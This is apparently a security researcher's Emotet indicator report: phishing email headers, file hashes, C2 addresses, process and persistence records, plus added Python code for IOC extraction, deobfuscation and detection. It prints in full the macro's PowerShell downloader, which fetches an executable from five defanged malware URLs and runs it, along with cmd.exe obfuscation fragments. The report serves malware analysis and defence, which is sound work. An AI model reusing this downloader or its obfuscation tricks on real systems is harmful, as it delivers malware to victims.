
#emotet_201218

VRad, Dec 23rd, 2018 (edited)
#IOC #OptiData #VR #emotet #feodo #W97M #powershell

https://pastebin.com/EejcbL4t

previous contact:
04/12/18        https://pastebin.com/znQDtbnt
09/11/18        https://pastebin.com/THHMs2wg
01/10/18        https://pastebin.com/Y6DnbpHv

FAQ:
https://radetskiy.wordpress.com/2018/10/19/ioc_emotet_011018/
https://kc.mcafee.com/corporate/index?page=content&id=KB90108

attack_vector
--------------
email attach .doc > macro > cmd (obfuscated) > powershell > GET 5 URL (first body >= 80000 bytes wins) > %temp%\***.exe > Invoke-Item

email_headers
--------------
Received: from server.arroyo.bz (server.arroyo.bz [65.60.8.150])
    by srv8.victim1.com for <user0@org7.kv.victim1.com>;
    Thu, 20 Dec 2018 20:00:26 +0200 (EET)
    (envelope-from veronicat@mccell.com.mx)
Received: from [138.122.96.73] (port=56726 helo=10.15.31.100)
    by server.arroyo.bz (Exim 4.91)
    for user0@org7.kv.victim1.com; Thu, 20 Dec 2018 12:00:07 -0600
Date: Thu, 20 Dec 2018 12:00:40 -0600
From: Вячеслав Прендзевский <prom@pride-ukraine.com.ua> <veronicat@mccell.com.mx>
To: user0@org7.kv.victim1.com
Subject: Вячеслав Прендзевский - Invoice 85841

note: the address the recipient sees, prom@pride-ukraine.com.ua, is part of the display name; the real sender and envelope-from is veronicat@mccell.com.mx, submitted from 138.122.96.73 (HELO with a private address, 10.15.31.100) through the Exim relay server.arroyo.bz

files
--------------
SHA-256 bf0d01d08d9ef9677f697e2e574429a72003319335616274510556c80c9a0a80
File name   Inv85841.doc
File size   144.5 KB

SHA-256 270d94b84b2acafeb682d975ecd076e96fe7892a095cd420b13eb1f54cc63fc1
File name   pEakCmvuBiB.exe
File size   536 KB

activity
**************

deobfuscated_macro
--------------
(the one-liner the macro hands to powershell.exe, URLs defanged with {.}; the single-use variables $o497, $c691, $U974, $j643, $a636 and $k418 are dead-store padding)
powershell $o497='G112';$E633=new-object Net.WebClient;
  # five download URLs packed into one string and split at run time
  $Q470='http://opewinsng {.}com/bOiANyEc@http://chamanga {.} org {.}uy/eE9DiHE6@http://ideagold {.}by/rzb6hSlC3@http://onetechblog{.} tek1{.} top/MyZztFl@http://maxclean{.} srv {.}br/QVtDDcAZ'.Split('@');
  $c691='w246';$V107 = '583';$U974='p613';
  # drop path: %temp%\583.exe
  $B338=$env:temp+'\'+$V107+'.exe';
  foreach($o680 in $Q470){try{$E633.DownloadFile($o680, $B338);$j643='Z181';
    # run the download only if it is at least 80000 bytes, so a 403/404 error page is saved but skipped and the next URL is tried
    If ((Get-Item $B338).length -ge 80000) {Invoke-Item $B338;$a636='Y317';break;}}catch{}}
  $k418='W330';
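An added IOC extractor for this downloader (my code, not part of the paste or of the sample): it pulls the URL list, the drop filename and the size gate out of the one-liner above, resolving the random variable name through the $VAR='literal' assignments rather than matching it by name, and models the foreach loop against constructed response sizes to show why only the URL that answered 200 under pl_src actually ran. The script constant is the defanged text from this page; the response sizes are assumed.

```python
import re

# The downloader one-liner exactly as listed on this page, still defanged ("{.}" for ".").
SCRIPT = (
    "powershell $o497='G112';$E633=new-object Net.WebClient;"
    "$Q470='http://opewinsng {.}com/bOiANyEc@http://chamanga {.} org {.}uy/eE9DiHE6@"
    "http://ideagold {.}by/rzb6hSlC3@http://onetechblog{.} tek1{.} top/MyZztFl@"
    "http://maxclean{.} srv {.}br/QVtDDcAZ'.Split('@');"
    "$c691='w246';$V107 = '583';$U974='p613';$B338=$env:temp+'\\'+$V107+'.exe';"
    "foreach($o680 in $Q470){try{$E633.DownloadFile($o680, $B338);$j643='Z181';"
    "If ((Get-Item $B338).length -ge 80000) {Invoke-Item $B338;$a636='Y317';break;}}catch{}}"
    "$k418='W330';"
)

ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*'([^']*)'")            # $name='literal'
URLLIST_RE = re.compile(r"'([^']*)'\.Split\('@'\)")            # '...@...'.Split('@')
DROP_RE = re.compile(r"\$env:temp\+'\\'\+\$(\w+)\+'\.exe'")    # $env:temp+'\'+$VAR+'.exe'
MINSIZE_RE = re.compile(r"\.length\s+-ge\s+(\d+)")             # size gate before Invoke-Item


def defang(url):
    """Normalise the page's ' {.} ' spacing to the usual hxxp://host[.]tld form."""
    url = re.sub(r"\s*\{\.\}\s*", "[.]", url)
    return re.sub(r"^http(s?)://", r"hxxp\1://", url)


def extract_downloader_iocs(script):
    """Pull the URL list, the drop filename and the size threshold out of the script.
    Variable names are random per sample, so the drop name is resolved through the
    $VAR='literal' assignment table instead of being matched by name."""
    literals = dict(ASSIGN_RE.findall(script))
    urls = URLLIST_RE.search(script)
    drop = DROP_RE.search(script)
    size = MINSIZE_RE.search(script)
    return {
        "urls": [defang(u) for u in urls.group(1).split("@")] if urls else [],
        "drop_name": literals[drop.group(1)] + ".exe" if drop else None,
        "min_size": int(size.group(1)) if size else 0,
    }


def first_viable(responses, min_size):
    """Model the foreach loop: the first URL whose body is at least min_size bytes is
    executed; a 403/404 error page is saved but skipped and the next URL is tried."""
    for url, status, body_len in responses:
        if body_len >= min_size:
            return url, status
    return None


# Constructed body sizes for the first three statuses listed under pl_src (assumed values,
# the page records only the status codes).
RESPONSES = [
    ("hxxp://opewinsng[.]com/bOiANyEc", 404, 1245),
    ("hxxp://chamanga[.]org[.]uy/eE9DiHE6", 200, 548864),
    ("hxxp://ideagold[.]by/rzb6hSlC3", 403, 1030),
]

if __name__ == "__main__":
    iocs = extract_downloader_iocs(SCRIPT)
    for u in iocs["urls"]:
        print(u)
    print(iocs["drop_name"], iocs["min_size"], first_viable(RESPONSES, iocs["min_size"]))
```

The 80000-byte check is why a hunt for this family cannot stop at "the first URL returned 404": the loop keeps going, and a dead-looking list still has one live source as long as any host serves a body larger than the gate.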

pl_src:     1/5   (one of the five download URLs still served the payload)
--------------
url                                          status
h11p:\ opewinsng {.}com/bOiANyEc            404
h11p:\ chamanga {.} org {.}uy/eE9DiHE6      200
h11p:\ ideagold {.}by/rzb6hSlC3             403
h11p:\ onetechblog{.} tek1{.} top/MyZztFl   403
h11p:\ maxclean{.} srv {.}br/QVtDDcAZ       404

C2:
--------------
http://189.226.214.129:8080/

netwrk
--------------
dst             host            request         user-agent
1.22.119.250    1.22.119.250    GET / HTTP/1.1  Mozilla/4.0

comp
--------------
process         PID     remote          port    state
stgintel.exe    2224    189.226.214.129 8080    SYN_SENT
stgintel.exe    2224    200.124.225.32  80      SYN_SENT
stgintel.exe    2224    70.80.135.35    8443    SYN_SENT
stgintel.exe    2224    201.102.7.208   8443    SYN_SENT
stgintel.exe    2224    189.222.245.247 80      SYN_SENT
stgintel.exe    2224    1.22.119.250    80      ESTABLISHED
(the dropped stgintel.exe walks its C2 list in turn; only 1.22.119.250:80 answered, which is the GET / above)

proc
--------------
"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
    (Word opening the attachment; /n /dde is the normal shell launch, not the exploit)

c:\c556902829965\u3692599496166\i47356399652\..\..\..\windows\system32\cmd.exe /c %PrOgraMdatA:...
    (macro child: cmd.exe reached through three bogus directories and ..\..\.. traversal, with its argument built from %PROGRAMDATA% substrings; truncated)

CmD    /V:   /R "  seT  gali=;'033W'=814k$}}{hctac}};kaerb;'713Y'=636a$;833B$ metI-ekovnI{ )00008...
    (delayed expansion /V: with the variable gali holding the PowerShell script written backwards, its tail first; truncated)

C:\Windows\system32\cmd.exe  /S /D /c" EchO pow%PUBLIC:~5,1%r%SESSIONNAME:...
    (the word powershell is spelled out from environment-variable substrings, e.g. %PUBLIC:~5,1% is the e in C:\Users\Public; truncated)

Cmd.EXe

powershell $o497='G112';$E633=new-object Net.WebClient;$Q470='http://opewinsng {.}com/bOiANyEc@http://chamanga {.} org {.}uy/eE9DiHE6@http://ideagold {.}by/rzb6hSlC3@http://onetechblog{.} tek1{.} top/MyZztFl@http://maxclean{.} srv {.}br/QVtDDcAZ'.Split('@');$c691='w246';$V107 = '583';$U974='p613';$B338=$env:temp+'\'+$V107+'.exe';foreach($o680 in $Q470){try{$E633.DownloadFile($o680, $B338);$j643='Z181';If ((Get-Item $B338).length -ge 80000) {Invoke-Item $B338;$a636='Y317';break;}}catch{}}$k418='W330';
    (the reassembled downloader, identical to deobfuscated_macro above)

C:\tmp\583.exe
    (first stage; %temp% on the analysis host is C:\tmp)

C:\Users\operator\AppData\Local\stgintel\stgintel.exe
    (the payload copied under a new name into %LOCALAPPDATA%)
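An added decoder for the two cmd.exe tricks in the process list above (my code, not from the paste or the sample): it implements cmd's %VAR:~start,len% substring semantics so the EchO line can be expanded against an assumed environment, and it recovers the readable PowerShell tail from the reversed value of the seT gali= stage. The seT fragment is the truncated text captured on this page; the EchO line is shown on the page only up to %SESSIONNAME:, so its continuation and the environment values here are constructed for the demo.

```python
import re

# The reversed-string stage as captured in the proc list on this page (truncated there).
SET_LINE = "CmD    /V:   /R \"  seT  gali=;'033W'=814k$}}{hctac}};kaerb;'713Y'=636a$;833B$ metI-ekovnI{ )00008"
# The page shows only "EchO pow%PUBLIC:~5,1%r%SESSIONNAME:..."; the rest of this line is a
# constructed continuation for the demo, not recovered from the sample.
ECHO_LINE = "EchO pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%hell"

# Assumed environment of the victim host; cmd resolves variable names case-insensitively.
ENV = {"PUBLIC": r"C:\Users\Public", "SESSIONNAME": "Console", "PROGRAMDATA": r"C:\ProgramData"}

SUBSTR_RE = re.compile(r"%(\w+):~(-?\d+)(?:,(-?\d+))?%")
SET_RE = re.compile(r"(?i)\bset\s+(\w+)=(.*)")


def cmd_substring(value, start, length=None):
    """%VAR:~start,len% as cmd.exe evaluates it: a negative start counts back from the
    end, a negative len drops that many characters from the end, no len means 'to the end'."""
    n = len(value)
    if start < 0:
        start = max(n + start, 0)
    if length is None:
        return value[start:]
    if length < 0:
        return value[start:max(n + length, start)]
    return value[start:start + length]


def expand_substrings(cmdline, env):
    """Replace every %VAR:~a,b% reference with the characters it selects."""
    def repl(m):
        value = env.get(m.group(1).upper())
        if value is None:
            return m.group(0)          # cmd leaves unknown variables as they are
        length = None if m.group(3) is None else int(m.group(3))
        return cmd_substring(value, int(m.group(2)), length)
    return SUBSTR_RE.sub(repl, cmdline)


def decode_reversed_set(cmdline):
    """Recover (name, payload) from a 'set NAME=<reversed script>' stage: the value is the
    PowerShell stored back to front, which the /V: delayed-expansion stage later reassembles
    one character at a time. Reversing it gives the readable tail of the script."""
    m = SET_RE.search(cmdline)
    if not m:
        return None
    return m.group(1), m.group(2)[::-1]


if __name__ == "__main__":
    print(expand_substrings(ECHO_LINE, ENV))
    print(decode_reversed_set(SET_LINE))
```

Both stages depend on the host: the substring trick picks letters out of whatever %PUBLIC% and %SESSIONNAME% hold, so a sandbox whose environment differs from a domain workstation (for example a non-default SESSIONNAME) can decode to garbage and never reach powershell.exe, which is worth remembering when a detonation looks inert.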

persist
--------------
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run              23.12.2018 13:19
value:        stgintel
description:  TortoisePlink   http://tortoisesvn.net   (description and publisher strings copied from TortoisePlink)
image path:   c:\users\operator\appdata\local\stgintel\stgintel.exe   22.12.2018 16:05

drop
--------------
C:\tmp\583.exe
C:\Users\operator\AppData\Local\stgintel\stgintel.exe
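An added detection pass over this chain (my code, not from the paste): four rules, Office spawning a shell, an obfuscated cmd.exe command line (..\ traversal into system32, %VAR:~n,m% character picking, or /V: delayed expansion), PowerShell that downloads and immediately runs a file, and a Run value whose name, folder and exe all match under %LOCALAPPDATA% as stgintel\stgintel.exe does here. The events are constructed Sysmon-style records: images, command lines and the Run entry follow the proc and persist sections above, but the parent processes are assumed, the PowerShell line is shortened, and the last two events are invented benign noise.

```python
import re

# Constructed Sysmon-style events modelled on the proc and persist sections of this page.
EVENTS = [
    {"type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE",
     "cmdline": r'"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde'},
    {"type": "process", "parent": r"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"c:\c556902829965\u3692599496166\i47356399652\..\..\..\windows\system32\cmd.exe /c %PrOgraMdatA:~0,1%"},
    {"type": "process", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "CmD    /V:   /R \"  seT  gali=;'033W'=814k$}}{hctac}};kaerb\""},
    {"type": "process", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell $E633=new-object Net.WebClient;$E633.DownloadFile($o680, $B338);Invoke-Item $B338"},
    {"type": "registry", "key": r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "value": "stgintel", "data": r"c:\users\operator\appdata\local\stgintel\stgintel.exe"},
    # benign noise (invented): a user shell from Explorer and a normal Run entry
    {"type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe"},
    {"type": "registry", "key": r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "value": "OneDrive", "data": r"C:\Users\operator\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"},
]

OFFICE_RE = re.compile(r"\\(winword|excel|powerpnt)\.exe$", re.I)
SHELL_RE = re.compile(r"\\(cmd|powershell|wscript|cscript|mshta)\.exe$", re.I)
TRAVERSAL_RE = re.compile(r"\\\.\.\\")                    # ..\ inside the image path
ENV_SUBSTR_RE = re.compile(r"%\w+:~-?\d+")                # %VAR:~n,m% character picking
DELAYED_RE = re.compile(r"(?i)/V(:ON|:OFF|:)?(\s|$)")      # cmd /V: delayed expansion
RUN_KEY_RE = re.compile(r"(?i)\\currentversion\\run$")
SELF_NAMED_RE = re.compile(r"(?i)\\appdata\\local\\([^\\]+)\\\1\.exe$")


def office_spawns_shell(e):
    return e["type"] == "process" and bool(OFFICE_RE.search(e["parent"])) and bool(SHELL_RE.search(e["image"]))


def obfuscated_cmdline(e):
    c = e.get("cmdline", "")
    return e["type"] == "process" and bool(TRAVERSAL_RE.search(c) or ENV_SUBSTR_RE.search(c) or DELAYED_RE.search(c))


def downloader_powershell(e):
    c = e.get("cmdline", "").lower()
    return e["type"] == "process" and "net.webclient" in c and "downloadfile" in c and ("invoke-item" in c or "start-process" in c)


def self_named_run_entry(e):
    # value name == folder name == exe name under %LOCALAPPDATA%, as stgintel\stgintel.exe here
    return e["type"] == "registry" and bool(RUN_KEY_RE.search(e["key"])) and bool(SELF_NAMED_RE.search(e["data"]))


RULES = [
    ("office_spawns_shell", office_spawns_shell),
    ("obfuscated_cmdline", obfuscated_cmdline),
    ("downloader_powershell", downloader_powershell),
    ("self_named_run_entry", self_named_run_entry),
]


def triage(events):
    """Return (event index, rule name) for every rule that fires."""
    return [(i, name) for i, e in enumerate(events) for name, rule in RULES if rule(e)]


if __name__ == "__main__":
    for i, name in triage(EVENTS):
        print(i, name, EVENTS[i].get("cmdline") or EVENTS[i].get("data"))
```

The Run-key rule is noisy on its own (plenty of legitimate per-user installers also use Local\name\name.exe), so it belongs as a corroborating signal after the Office-to-shell chain has fired, not as a stand-alone alert; the chain rules are the ones that catch the sample before stgintel.exe exists.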

VR

# # #
https://www.virustotal.com/#/file/bf0d01d08d9ef9677f697e2e574429a72003319335616274510556c80c9a0a80/details
https://www.virustotal.com/#/file/270d94b84b2acafeb682d975ecd076e96fe7892a095cd420b13eb1f54cc63fc1/details
https://analyze.intezer.com/#/analyses/9142da6d-ba72-4ff1-a515-5b187735a162